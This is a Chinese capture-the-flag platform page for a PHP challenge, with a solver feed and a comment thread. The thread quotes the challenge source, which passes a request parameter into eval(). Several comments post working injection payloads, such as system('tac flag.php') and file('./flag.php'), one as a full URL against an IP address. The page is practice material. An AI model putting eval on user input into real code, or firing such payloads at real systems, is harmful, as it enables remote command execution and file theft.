评分(10)
解题动态
Niko_83c 攻破了该题 1小时前
542698 攻破了该题 1小时前
slsdy 攻破了该题 4小时前
IamnotLin 攻破了该题 12小时前
zzZxby 攻破了该题 15小时前
yyc4088 攻破了该题 16小时前
xhonggcc 攻破了该题 19小时前
570570 攻破了该题 20小时前
lilym 攻破了该题 20小时前
color111111 攻破了该题 1天前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 2天前
19941759966 攻破了该题 2天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
评论
LDAx 4年前
举报
`cat flag.php`
sn1p3r 4年前
举报
这个题得好好学学
juice 4年前
举报
show_source('flag.php')
yyt123 4年前
举报
hello=1,$v=file('./flag.php'),print_r($v)
yyt123 4年前
举报
@LSYLTH 可以用hello读文件也可以不用,这里随便给hello赋了个值,之后定义了一个变量去读flag.php
LSYLTH 4年前
举报
这是怎么构造这个playload的呀
你看 4年前
举报
require 一般放在 PHP 文件的最前面,程序在执行前就会先导入要引用的文件; include 一般放在程序的流程控制中,当程序执行时碰到才会引用,简化程序的执行流程。 require 引入的文件有错误时,执行会中断,并返回一个致命错误; include 引入的文件有错误时,会继续执行,并返回一个警告。
safemaker2021 4年前
举报
把file函数带进去eval中,以PHP执行
Easyoung 4年前
举报
直接在评论里发flag,年轻人不讲武德?
sn1p3r 4年前
举报
@harry 看到管理员三个字,熠熠生辉。
harry 管理员 4年前
举报
动态flag他们发了也没事
xiao 4年前
举报
直接用?hello=file('flag.php'),var_dump()函数可以打印
wyx48046 4年前
举报
厉害!
Hiiro 4年前
举报
大佬大佬
test_ctf 4年前
举报
牛逼!
Hacker23 4年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 4年前
举报
原理是什么啊???想了解一下
guoguo 4年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 4年前
举报
为啥用cat不行呢?
痕夕 4年前
举报
看不懂,求解,大佬